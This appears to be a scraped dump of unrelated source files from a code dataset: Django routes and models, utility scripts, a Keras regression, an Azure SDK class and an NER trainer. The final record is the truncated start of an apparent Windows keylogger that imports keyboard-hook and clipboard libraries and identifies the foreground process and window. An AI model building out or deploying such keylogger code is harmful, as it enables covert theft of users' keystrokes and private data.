'proj.views.blog_view_paginas', name= 'blog_view_paginas'),\n\n\turl(r'^blog/post/(?P[0-9]+)/$', 'proj.views.post_view', name= 'post_view'),\n\n\turl(r'^login/$', ListView.as_view(\n\t\t\t\t\t\tmodel = Blog,\n\t\t\t\t\t\ttemplate_name=\"login.html\")),\n\n\n\turl(r'^forum/$', 'proj.views.forum_page', name= 'forum_page'),\n\n\turl(r'^forum/logout/$', 'proj.views.logout_view', name= 'logout_view'),\n\n\turl(r'^forum/(?P[0-9]+)/$', 'proj.views.forum_view', name= 'forum_view'),\n\n\turl(r'^forum/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.forum_view_pagina', name= 'forum_view_pagina'),\n\n\turl(r'^forum/(?P[0-9]+)/CriarTopico/$', 'proj.views.create_post', name= 'create_post'),\n\n\turl(r'^forum/(?P[0-9]+)/postTopico/$', 'proj.views.post_topico', name= 'post_topico'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/$', 'proj.views.topico_view', name= 'topico_view'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.topico_view_paginas', name= 'topico_view_paginas'),\n\n\turl(r'^forum/topico/(?P[0-9]+)/(?P[/comentario/]*)comentario/$', 'proj.views.post_comentario', name= 'post_comentario'),\n\n\turl(r'^forum/mensagens/$', 'proj.views.mensagens_view', name= 'mensagens_view'),\n\n\turl(r'^forum/mensagem/(?P[0-9]+)/$', 'proj.views.single_mensage', name= 'single_mensage'),\n\n\turl(r'^forum/mensagem/(?P[0-9]+)/(?P[0-9]+)/$', 'proj.views.single_mensage_paginas', name= 'single_mensage_paginas'),\n\n\n\turl(r'^forum/post_mensagem/(?P[0-9]+)/$', 'proj.views.post_mensagem', name= 'post_mensagem'),\n\n\turl(r'^forum/post_mensagem/$', 'proj.views.post_mensagem_inicial', name= 'post_mensagem_inicial'),\n\n\turl(r'^forum/post_removeCom/$', 'proj.views.post_removeCom', name= 'post_removeCom'),\n\n\turl(r'^about/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"about.html\")),\n\n\turl(r'^contact/$', ListView.as_view(\n \tqueryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"contact.html\")),\n\n\turl(r'^post_email/$', 'proj.views.post_email', name= 'post_email'),\n\n\turl(r'^post_login/$', 'proj.views.login_view', name= 
'login_view'),\n\n\turl(r'^post_User/$', 'proj.views.edit_names', name= 'edit_names'),\n\n\turl(r'^teste/$', 'proj.views.verifica_mensagens', name= 'verifica_mensagens'),\n\n\turl(r'^oquefazemos/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"oquefazemos.html\")),\n\n\turl(r'^parceiros/$', ListView.as_view(\n queryset=Blog.objects.all().order_by(\"-date\"),\n template_name=\"patrocinios.html\")),\n\t \n\t url(r'^circulos/$', ListView.as_view(\n queryset=Circulos.objects.all().order_by(\"-date\"),\n template_name=\"circulos.html\")),\n\n\t url(r'^radio/$', ListView.as_view(\n queryset=Musica.objects.all(),\n template_name=\"radio.html\")),\n\n\n\t url(r'^forum/areapessoal/$', 'proj.views.area_pessoal', name= 'area_pessoal'),\n\n\t url(r'^forum/editarperfil/$', ListView.as_view(\n\t\t\t\t\tmodel = Blog,\n\t\t\t\t\ttemplate_name=\"editarprofile.html\")),\n\n\t url(r'^forum/novamensagem/$', 'proj.views.pessoal_circulo', name= 'pessoal_circulo'),\n\n\t #url(r'^novamensagem/$', ListView.as_view(\n # queryset=Participante.objects.all(),\n # template_name=\"teste.html\")),\n\n\turl(r'^(?P\\d+)$', DetailView.as_view(\n\t\tmodel = Blog,\n\t\ttemplate_name=\"post.html\")),\n\n\turl(r'^base$', ListView.as_view(\n\t\tqueryset=Blog.objects.all().order_by(\"-date\"),\n\t\ttemplate_name=\"base.html\")),\n\n\turl(r'^api/user/$', 'proj.views.api_user', name= 'api_user'),\n\n\turl(r'^api/forum/$', 'proj.views.api_forum', name= 'api_forum'),\n\n\turl(r'^api/circulo/$', 'proj.views.api_circulo', name= 'api_circulo'),\n\n\turl(r'^api/mensagens/$', 'proj.views.api_forum', name= 'api_forum'), #notDone\n\n\turl(r'^api/mensagem/$', 'proj.views.api_mensagem', name= 'api_mensagem'), \n\n\turl(r'^api/comentario/$', 'proj.views.api_comentario', name= 'api_comentario'),\n\n\t)","sub_path":"ldso/proj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496295462","text":"#!/usr/bin/python3\n# Read the lines of the input file and sort them in various ways.\n\nimport sys\n\ndef prlines(label, lines):\n print(label+\":\")\n for x in lines:\n print(\" \"+x)\n print()\n\nlines=[]\nwhile True:\n line = sys.stdin.readline()\n if not line:\n break\n lines.append(line[:-1])\n\nprlines(\"Initial\", lines)\nlines.sort()\nprlines(\"Sorted\", lines)\n\n# This function is for sorting on the second word in the line,\n# case-insensitive. 
It also shows an alternate way to call the system\n# sort.\ndef second(line):\n return line.split()[1].lower()\nbysecond = sorted(lines, key=second)\nprlines(\"Sorted on second word, case insensitive\", bysecond)\n\n# Sort the lines by length.\nlines.sort(key=lambda s: len(s))\nprlines(\"Sorted by length\", lines)\n\n# Sort by the number of words, followed by the line itself.\n# The comparison function returns a tuple, which will be compared by\n# comparing the first thing, then the second if the first does not match.\ndef words_then_text(s):\n return (len(s.split()), s.lower())\nlines.sort(key=words_then_text)\nprlines(\"Sorted by number of words, then CI text\", lines)\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"394032070","text":"#!/usr/bin/env python3\nimport http.client, urllib.parse\nimport base64\nimport ssl\n\nclass WarehouseClient:\n\n def __init__(self):\n self.connection = http.client.HTTPSConnection(\"localhost:443\")\n\n def validAuth(self):\n try:\n creds = base64.b64encode(b'testUsername:testPassword').decode()\n header = {'Authorization': 'Basic ' + creds}\n self.connection.request(\"GET\", \"/warehouse\", headers = header)\n resp = self.connection.getresponse()\n if resp.status == 200:\n data = resp.read().decode(\"utf-8\")\n print(data)\n return str(data)\n else:\n # a non-200 status is signalled via KeyError and handled below\n print(\"error: unexpected status\", resp.status)\n raise KeyError\n except KeyError:\n return \"KeyError(invalid login params)\"\n\n\ndef main():\n auth = WarehouseClient()\n auth.validAuth()\n\nmain()","sub_path":"auth_client.py","file_name":"auth_client.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"429018413","text":"from pystatic.domain.aggregates.file.model.file import File\n\n__author__ = 'H.Rouhani'\n\n\nclass FileRemove:\n storage_name = None\n path = None\n\n def __init__(self, dto):\n self.__dict__.update(dto)\n\n def execute(self):\n file = File(self.storage_name)\n file.path = self.path\n file.remove_by_path()\n","sub_path":"Statics/pystatic/domain/aggregates/file/app/v1_0/rest/command/internal/file_remove.py","file_name":"file_remove.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"220435321","text":"from PIL import Image\nfrom sys import argv\nimport base64\nimport io\n\ndef main():\n image = Image.open(argv[1])\n output = io.BytesIO()\n image.save(output, format=\"jpeg\")\n image_bytes = output.getvalue()\n # raw JPEG bytes are not valid UTF-8, so emit them base64-encoded instead\n print(base64.b64encode(image_bytes).decode(\"ascii\"))\nmain()\n","sub_path":"scripts/imageReader.py","file_name":"imageReader.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
{"seq_id":"190803504","text":"from django.db import models\nfrom django.conf import settings\n\n# Create your models here.\nclass Link(models.Model):\n url = models.URLField()\n description = models.TextField(blank=True)\n posted_by = models.ForeignKey(\n settings.AUTH_USER_MODEL, blank=True, null=True, on_delete=models.CASCADE\n )\n\n\nclass Store(models.Model):\n def __str__(self):\n return \"Store: \" + self.name\n\n name = models.CharField(max_length=50)\n\n\nclass Item(models.Model):\n def __str__(self):\n return \"Item: \" + self.name\n\n name = 
models.CharField(max_length=50)\n qty = models.IntegerField()\n stores = models.ManyToManyField(Store, blank=True, related_name=\"items\")\n bought = models.DateField(default=None, blank=True, null=True)\n bought_by = models.ForeignKey(\n settings.AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL\n )\n\n\nclass House(models.Model):\n def __str__(self):\n return \"House: \" + self.name\n\n name = models.CharField(max_length=50)\n users = models.ManyToManyField(\n settings.AUTH_USER_MODEL, blank=True, related_name=\"houses\"\n )\n items = models.ManyToManyField(Item, blank=True, related_name=\"houses\")\n faveStores = models.ManyToManyField(Store, blank=True, related_name=\"houses\")\n\n\nclass Invite(models.Model):\n def __str__(self):\n return f\"Token for {self.first_name}\"\n\n token = models.CharField(max_length=20)\n first_name = models.CharField(max_length=50)\n last_name = models.CharField(max_length=50)\n email = models.CharField(max_length=50)\n house = models.ForeignKey(House, on_delete=models.CASCADE)\n created = models.DateField(auto_now_add=True)\n","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"603122700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 01:15:13 2020\n\n@author: oyedeepak\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# importing dataset\ndf= pd.read_csv(r\"C:\\Users\\oyedeepak\\Downloads\\Assignment\\Neural Network\\50_Startups.csv\")\ndf.head()\n\nx= df.iloc[:, :-1].values\ny= df.iloc[:, 4].values\n\n#Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder=LabelEncoder()\nx[:,3]=labelencoder.fit_transform(x[:,3])\nonehotencoder=OneHotEncoder(categorical_features=[3])\nx=onehotencoder.fit_transform(x).toarray()\n\n#Avoiding the Dummy Variable Trap\nx=x[:,1:]\n\n'''\nstates= pd.get_dummies(x['State'], drop_first= True)\nx= x.drop('State', axis= 1)\n# concat the dummy variables\n\nx= pd.concat([x, states], axis= 1)\n\n#x=x.values\n#y=y.values\n'''\n\n#splitting the dataset\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test= train_test_split(x, y, test_size= 0.2, random_state= 20)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc= StandardScaler()\nx_train= sc.fit_transform(x_train)\nx_test= sc.transform(x_test)\n\n\n#Defining Root Mean Square Error As our Metric Function \nfrom keras import backend\ndef rmse(y_true, y_pred):\n\treturn backend.sqrt(backend.mean(backend.square(y_pred - y_true), axis=-1))\n\n# importing keras and libraries\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.wrappers.scikit_learn import KerasRegressor\n\n\n#initilising ANN\nclassifier= Sequential()\n\nx.shape\nclassifier.add(Dense(30, input_dim=5,init= 'uniform', activation='relu'))\n\nclassifier.add(Dense(25,init= 'uniform', activation='relu'))\nclassifier.add(Dense(20,init= 'uniform', activation='relu'))\nclassifier.add(Dense(15,init= 'uniform', activation='relu'))\nclassifier.add(Dense(15,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\nclassifier.add(Dense(10,init= 'uniform', activation='relu'))\n\n\n#output 
layer\nclassifier.add(Dense(output_dim=1,init= 'uniform', activation='linear'))\n\n#compile\nclassifier.compile(optimizer= keras.optimizers.Adadelta(), loss= 'mean_squared_error', metrics= [rmse])\n\n\n#fitting the ANN to training set\nclassifier.fit(x_train, y_train, batch_size=10, epochs=100)\n\n\n#preditcting the test set results\ny_pred= classifier.predict(x_test)\n\n\nfrom sklearn.metrics import r2_score\nprint(r2_score(y_test,y_pred)) #r2 score = 0.92\n","sub_path":"Neural Network/ANN_startups.py","file_name":"ANN_startups.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"481989037","text":"# coding=utf-8\n# author=yphacker\n\nimport gc\nimport os\nimport time\nimport json\nimport argparse\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nfrom importlib import import_module\nfrom conf import config\nfrom utils.data_utils2 import MyDataset, collate_fn\nfrom utils.metrics_utils import get_score\nfrom utils.utils import set_seed, get_entities\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef get_inputs(batch_x, batch_y=None):\n batch_x = tuple(t.to(device) for t in batch_x)\n if batch_y is not None:\n batch_y = batch_y.to(device)\n if 'crf' in model_name:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], input_lens=batch_x[3], labels=batch_y)\n else:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], labels=batch_y)\n else:\n if 'crf' in model_name:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2], input_lens=batch_x[3])\n else:\n return dict(input_ids=batch_x[0], attention_mask=batch_x[1],\n token_type_ids=batch_x[2])\n\n\ndef evaluate(model, val_iter):\n model.eval()\n data_len = 0\n total_loss = 0\n y_true_list = []\n y_pred_list = []\n with torch.no_grad():\n for batch_x, batch_y in tqdm(val_iter):\n batch_len = len(batch_y)\n data_len += batch_len\n inputs = get_inputs(batch_x, batch_y)\n outputs = model(**inputs)\n _loss, logits = outputs[:2]\n total_loss += _loss.item() * batch_len\n y_true_list += batch_y.cpu().data.numpy().tolist()\n if 'crf' in model_name:\n preds, _ = model.crf._obtain_labels(logits, config.id2label, inputs['input_lens'])\n else:\n preds = torch.argmax(logits, dim=2)\n preds = preds.cpu().data.numpy().tolist()\n y_pred_list += preds\n return total_loss / data_len, get_score(y_true_list, y_pred_list)\n\n\ndef train(train_data, val_data, fold_idx=None):\n train_dataset = MyDataset(train_data)\n val_dataset = MyDataset(val_data)\n\n train_loader = DataLoader(train_dataset, batch_size=config.batch_size, collate_fn=collate_fn)\n val_loader = DataLoader(val_dataset, batch_size=config.batch_size, collate_fn=collate_fn)\n # val_loader = DataLoader(val_dataset, batch_size=1, collate_fn=collate_fn)\n\n model = model_file.Model().to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=model_config.learning_rate)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.1)\n\n if fold_idx is None:\n print('start')\n model_save_path = os.path.join(config.model_path, '{}.bin'.format(model_name))\n else:\n print('start fold: {}'.format(fold_idx + 1))\n model_save_path = os.path.join(config.model_path, '{}_fold{}.bin'.format(model_name, 
fold_idx))\n\n best_val_score = 0\n last_improved_epoch = 0\n adjust_lr_num = 0\n y_true_list = []\n y_pred_list = []\n for cur_epoch in range(config.epochs_num):\n start_time = int(time.time())\n model.train()\n print('epoch:{}, step:{}'.format(cur_epoch + 1, len(train_loader)))\n cur_step = 0\n for batch_x, batch_y in tqdm(train_loader):\n inputs = get_inputs(batch_x, batch_y)\n optimizer.zero_grad()\n outputs = model(**inputs)\n train_loss, logits = outputs[:2]\n train_loss.backward()\n optimizer.step()\n\n cur_step += 1\n # decoding is slow with the CRF head, so keep this training-metrics\n # block commented out when training a CRF model\n # y_true_list += batch_y.cpu().data.numpy().tolist()\n # if 'crf' in model_name:\n # preds, _ = model.crf._obtain_labels(logits, config.id2label, inputs['input_lens'])\n # else:\n # preds = torch.argmax(logits, dim=2)\n # preds = preds.cpu().data.numpy().tolist()\n # y_pred_list += preds\n # if cur_step % config.train_print_step == 0:\n # train_score = get_score(y_true_list, y_pred_list)\n # msg = 'the current step: {0}/{1}, train loss: {2:>5.2}, train score: {3:>6.2%}'\n # print(msg.format(cur_step, len(train_loader), train_loss.item(), train_score))\n # y_true_list = []\n # y_pred_list = []\n # skip evaluation during the first 3 epochs; with too little training\n # the early scores may be misleading\n if cur_epoch <= 3:\n continue\n val_loss, val_score = evaluate(model, val_loader)\n if val_score >= best_val_score:\n best_val_score = val_score\n torch.save(model.state_dict(), model_save_path)\n last_improved_epoch = cur_epoch\n improved_str = '*'\n else:\n improved_str = ''\n # msg = 'the current epoch: {0}/{1}, train loss: {2:>5.2}, train acc: {3:>6.2%}, ' \\\n # 'val loss: {4:>5.2}, val acc: {5:>6.2%}, {6}'\n msg = 'the current epoch: {0}/{1}, val loss: {2:>5.2}, val score: {3:>6.2%}, cost: {4}s {5}'\n end_time = int(time.time())\n print(msg.format(cur_epoch + 1, config.epochs_num, val_loss, val_score,\n end_time - start_time, improved_str))\n if cur_epoch - last_improved_epoch >= config.patience_epoch:\n if adjust_lr_num >= model_config.adjust_lr_num:\n print(\"No optimization for a long time, auto stopping...\")\n break\n print(\"No optimization for a long time, adjust lr...\")\n scheduler.step()\n last_improved_epoch = cur_epoch # reset, otherwise the lr would be adjusted again on every subsequent epoch\n adjust_lr_num += 1\n del model\n gc.collect()\n\n if fold_idx is not None:\n model_score[fold_idx] = best_val_score\n\n\ndef eval():\n pass\n\n\ndef predict():\n model = model_file.Model().to(device)\n model_save_path = os.path.join(config.model_path, '{}.bin'.format(model_name))\n model.load_state_dict(torch.load(model_save_path))\n model.eval()\n test_df = pd.read_csv(config.test_path)\n # submission = pd.read_csv(config.sample_submission_path)\n\n test_dataset = MyDataset(test_df, 'test')\n test_iter = DataLoader(test_dataset, batch_size=config.batch_size, shuffle=False)\n\n results = []\n with torch.no_grad():\n for batch_x, _ in tqdm(test_iter):\n inputs = get_inputs(batch_x)\n outputs = model(**inputs)\n logits = outputs[0]\n preds = torch.argmax(logits, dim=2)\n for pred in preds:\n pred = pred.cpu().data.numpy()[1:-1] # strip the [CLS] and [SEP] positions\n tags = [config.id2label[x] for x in pred]\n label_entities = get_entities(pred, config.id2label)\n pred_dict = dict()\n pred_dict['tag_seq'] = \" \".join(tags)\n pred_dict['entities'] = label_entities\n results.append(pred_dict)\n test_text = []\n with open(\"../data/test.json\", 'r') as fr:\n for line in fr:\n test_text.append(json.loads(line))\n submission = []\n for x, y in zip(test_text, results):\n item = dict()\n item['id'] = x['id']\n item['label'] = {}\n entities = y['entities']\n words = list(x['text'])\n if len(entities) != 0:\n for 
subject in entities:\n tag = subject[0]\n start = subject[1]\n end = subject[2]\n word = \"\".join(words[start:end + 1])\n if tag in item['label']:\n if word in item['label'][tag]:\n item['label'][tag][word].append([start, end])\n else:\n item['label'][tag][word] = [[start, end]]\n else:\n item['label'][tag] = {}\n item['label'][tag][word] = [[start, end]]\n submission.append(item)\n\n with open('submission.json', 'w') as outfile:\n for line in submission:\n line = json.dumps(line, ensure_ascii=False)\n outfile.write(line + '\\n')\n\n\ndef main(op):\n if op == 'train':\n train_df = pd.read_csv(config.train_path)\n # train_df = train_df[:1000]\n if args.mode == 1:\n # x = train_df['comment_text'].values\n # # y = train_df[[\"toxic\", \"severe_toxic\", \"obscene\", \"threat\", \"insult\", \"identity_hate\"]].values\n # y = train_df['toxic'].values\n # skf = StratifiedKFold(n_splits=config.n_splits, random_state=0, shuffle=True)\n # for fold_idx, (train_idx, val_idx) in enumerate(skf.split(x, y)):\n # train(train_df.iloc[train_idx], train_df.iloc[val_idx], fold_idx)\n # score = 0\n # score_list = []\n # for fold_idx in range(config.n_splits):\n # score += model_score[fold_idx]\n # score_list.append('{:.4f}'.format(model_score[fold_idx]))\n # print('val score:{}, avg val score:{:.4f}'.format(','.join(score_list), score / config.n_splits))\n pass\n else:\n train_data, val_data = train_test_split(train_df, shuffle=True, random_state=0, test_size=0.1)\n print('train:{}, val:{}'.format(train_data.shape[0], val_data.shape[0]))\n train(train_data, val_data)\n elif op == 'eval':\n pass\n elif op == 'predict':\n predict()\n\n\nif __name__ == '__main__':\n set_seed()\n parser = argparse.ArgumentParser(description='Chinese NER')\n parser.add_argument(\"-o\", \"--operation\", default='train', type=str, help=\"operation\")\n parser.add_argument(\"-b\", \"--batch_size\", default=32, type=int, help=\"batch size\")\n parser.add_argument(\"-e\", \"--epochs_num\", default=8, type=int, help=\"train epochs\")\n parser.add_argument(\"-m\", \"--model\", default='cnn', type=str, required=True,\n help=\"choose a model: bert\")\n parser.add_argument(\"-mode\", \"--mode\", default=1, type=int, help=\"train mode\")\n args = parser.parse_args()\n\n config.batch_size = args.batch_size\n config.epochs_num = args.epochs_num\n model_name = args.model\n\n model_file = import_module('models.{}'.format(model_name))\n\n if model_name in ['bert', 'bert_crf']:\n from conf import model_config_bert as model_config\n elif model_name in ['albert', 'albert_crf']:\n from conf import model_config_albert as model_config\n\n model_score = dict()\n main(args.operation)\n","sub_path":"src/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":10695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"446126734","text":"from django.urls import path\nfrom .views import CheckoutView, \\\n ItemDetailView, \\\n HomeView, \\\n add_to_card, \\\n remove_from_card, \\\n OrderSummaryView, \\\n remove_single_item_from_card, \\\n add_to_card_in_order, \\\n PaymentView, \\\n AddCouponView, \\\n RequestRefundView\n\napp_name = 'core'\n\nurlpatterns = [\n path('checkout/', CheckoutView.as_view(), name='checkout-page'),\n path('order-summary/', OrderSummaryView.as_view(), name='order-summary'),\n path('product//', ItemDetailView.as_view(), name='products-page'),\n path('', HomeView.as_view(), name='home-page'),\n path('add-to-card//', add_to_card, name='add-to-card'),\n path('add_coupon/', 
AddCouponView.as_view(), name='add-coupon'),\n path('add-to-card-order//', add_to_card_in_order, name='add-to-card-order'),\n path('remove_from_card//', remove_from_card, name='remove-from-card'),\n path('remove_item_from_card//', remove_single_item_from_card, name='remove-single-item-from-card'),\n path('payment//', PaymentView.as_view(), name='payment'),\n path('request-refund/', RequestRefundView.as_view(), name='request-refund')\n\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"546644805","text":"import api_server.requests as ar\nimport analysis.similarities_comparison as sc\n\napi_server = 'api-dev.nrgene.local:8080'\ndv1='maize_benchmark_test_fix_mkrs_919_03'\ndv2 = 'maize_benchmark_only_arg_wgs'\ndv3 = 'dm_gm_public_maize_232'\nsamples_wgs=['b73v4__ver100', 'cml247__ver100', 'ep1_v2__ver100', 'w22__ver100', 'ki3__ver110', 'f7_v2__ver100', 'mo17__ver100']\nsamples_snp = ['b73', 'cml247', 'ep1', 'w22', 'ki3', 'f7', 'mo17']\nn = len(samples_wgs)\nmy_dict = {}\nfor i in range(n):\n my_dict[samples_snp[i]] = samples_wgs[i]\nhap_sim1 = ar.get_raw_similarities_between_multiple_sampels(api_server, dv1, samples_wgs, \"1,2\")\nhap_sim2 = ar.get_raw_similarities_between_multiple_sampels(api_server, dv2, samples_wgs, \"1,2\")\nsnp_sim = ar.get_raw_similarities_between_multiple_sampels(api_server, dv3, samples_snp, \"1,2\").replace(my_dict)\n[fn1, fp1, intersect1] = sc.compute_similarity_match_for_multiple_sampels_in_df(hap_sim1, snp_sim, samples_wgs)\n[fn2, fp2, intersect2] = sc.compute_similarity_match_for_multiple_sampels_in_df(hap_sim2, snp_sim, samples_wgs)\nprint(\"{} {} {}\".format(fn1/1000000, fp1/1000000, intersect1/1000000))\nprint(\"{} {} {}\".format(fn2/1000000, fp2/1000000, intersect2/1000000))","sub_path":"usage_scripts_example/compare_similarities_script.py","file_name":"compare_similarities_script.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"483236575","text":"valores_scrabble = {1: ['A','E','I','O','U','L','N','R','S','T'], \n2: ['D','G'], \n3:['B', 'C', 'M', 'P'],\n4: ['F', 'H', 'V', 'W', 'Y'],\n5: 'K',\n8: ['J','X'],\n10: ['Q','Z']}\n\npuntos = (1, 2, 3, 4, 5, 8, 10)\n\ndef verificar_valor (letra : str):\n '''Receives a letter and returns that letter's Scrabble score (0 if unknown)'''\n i = 0\n pts = 0\n encontre = False\n # bound i so letters outside the table (e.g. 'Ñ') cannot loop forever\n while not encontre and i < len(puntos):\n if letra in valores_scrabble[puntos[i]]:\n pts = puntos[i]\n encontre = True\n else:\n i += 1\n return pts\n \n \n\npalabra = input('Ingrese una palabra (\\'FIN\\' para terminar): ').upper()\npts = 0\nwhile (palabra != 'FIN'):\n for letra in palabra:\n pts += verificar_valor(letra)\n print(f'{palabra.capitalize()}: {pts} puntos.')\n palabra = input('Ingrese una palabra (\\'FIN\\' para terminar): ').upper()\n pts = 0","sub_path":"Ej10_p2.py","file_name":"Ej10_p2.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"140197028","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom .update_resource_py3 import UpdateResource\n\n\nclass LabFragment(UpdateResource):\n \"\"\"A lab.\n\n :param tags: The tags of the resource.\n :type tags: dict[str, str]\n :param lab_storage_type: Type of storage used by the lab. It can be either\n Premium or Standard. Default is Premium. Possible values include:\n 'Standard', 'Premium'\n :type lab_storage_type: str or ~azure.mgmt.devtestlabs.models.StorageType\n :param mandatory_artifacts_resource_ids_linux: The ordered list of\n artifact resource IDs that should be applied on all Linux VM creations by\n default, prior to the artifacts specified by the user.\n :type mandatory_artifacts_resource_ids_linux: list[str]\n :param mandatory_artifacts_resource_ids_windows: The ordered list of\n artifact resource IDs that should be applied on all Windows VM creations\n by default, prior to the artifacts specified by the user.\n :type mandatory_artifacts_resource_ids_windows: list[str]\n :param premium_data_disks: The setting to enable usage of premium data\n disks.\n When its value is 'Enabled', creation of standard or premium data disks is\n allowed.\n When its value is 'Disabled', only creation of standard data disks is\n allowed. Possible values include: 'Disabled', 'Enabled'\n :type premium_data_disks: str or\n ~azure.mgmt.devtestlabs.models.PremiumDataDisk\n :param environment_permission: The access rights to be granted to the user\n when provisioning an environment. Possible values include: 'Reader',\n 'Contributor'\n :type environment_permission: str or\n ~azure.mgmt.devtestlabs.models.EnvironmentPermission\n :param announcement: The properties of any lab announcement associated\n with this lab\n :type announcement:\n ~azure.mgmt.devtestlabs.models.LabAnnouncementPropertiesFragment\n :param support: The properties of any lab support message associated with\n this lab\n :type support: ~azure.mgmt.devtestlabs.models.LabSupportPropertiesFragment\n :param extended_properties: Extended properties of the lab used for\n experimental features\n :type extended_properties: dict[str, str]\n \"\"\"\n\n _attribute_map = {\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'lab_storage_type': {'key': 'properties.labStorageType', 'type': 'str'},\n 'mandatory_artifacts_resource_ids_linux': {'key': 'properties.mandatoryArtifactsResourceIdsLinux', 'type': '[str]'},\n 'mandatory_artifacts_resource_ids_windows': {'key': 'properties.mandatoryArtifactsResourceIdsWindows', 'type': '[str]'},\n 'premium_data_disks': {'key': 'properties.premiumDataDisks', 'type': 'str'},\n 'environment_permission': {'key': 'properties.environmentPermission', 'type': 'str'},\n 'announcement': {'key': 'properties.announcement', 'type': 'LabAnnouncementPropertiesFragment'},\n 'support': {'key': 'properties.support', 'type': 'LabSupportPropertiesFragment'},\n 'extended_properties': {'key': 'properties.extendedProperties', 'type': '{str}'},\n }\n\n def __init__(self, *, tags=None, lab_storage_type=None, mandatory_artifacts_resource_ids_linux=None, mandatory_artifacts_resource_ids_windows=None, premium_data_disks=None, environment_permission=None, announcement=None, support=None, extended_properties=None, **kwargs) -> None:\n super(LabFragment, self).__init__(tags=tags, **kwargs)\n 
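 # Usage sketch (hedged; the 'client' object and operation name are\n # assumptions, not defined in this module): a fragment carries only the\n # fields to change, e.g. LabFragment(lab_storage_type='Premium') handed\n # to the lab update operation of the devtestlabs management client.\n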
self.lab_storage_type = lab_storage_type\n self.mandatory_artifacts_resource_ids_linux = mandatory_artifacts_resource_ids_linux\n self.mandatory_artifacts_resource_ids_windows = mandatory_artifacts_resource_ids_windows\n self.premium_data_disks = premium_data_disks\n self.environment_permission = environment_permission\n self.announcement = announcement\n self.support = support\n self.extended_properties = extended_properties\n","sub_path":"azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/lab_fragment_py3.py","file_name":"lab_fragment_py3.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331271640","text":"import pythoncom\nimport pyHook3\nimport win32clipboard\nfrom ctypes import *\n\nuser32 = windll.user32\nkernel32 = windll.kernel32\npsapi = windll.psapi\ncurrent_window = None\n\ndef get_current_process():\n\n # Get the handle of the foreground (topmost) window\n hwnd = user32.GetForegroundWindow()\n\n # Get the process ID\n pid = c_ulong(0)\n user32.GetWindowThreadProcessId(hwnd, byref(pid))\n\n # Store the process ID in a variable\n process_id = \"%d\" % pid.value\n\n # Allocate a buffer (ctypes needs bytes in Python 3)\n executable = create_string_buffer(b\"\\x00\"*512)\n h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)\n\n psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)\n\n # Read the window title\n windows_title = 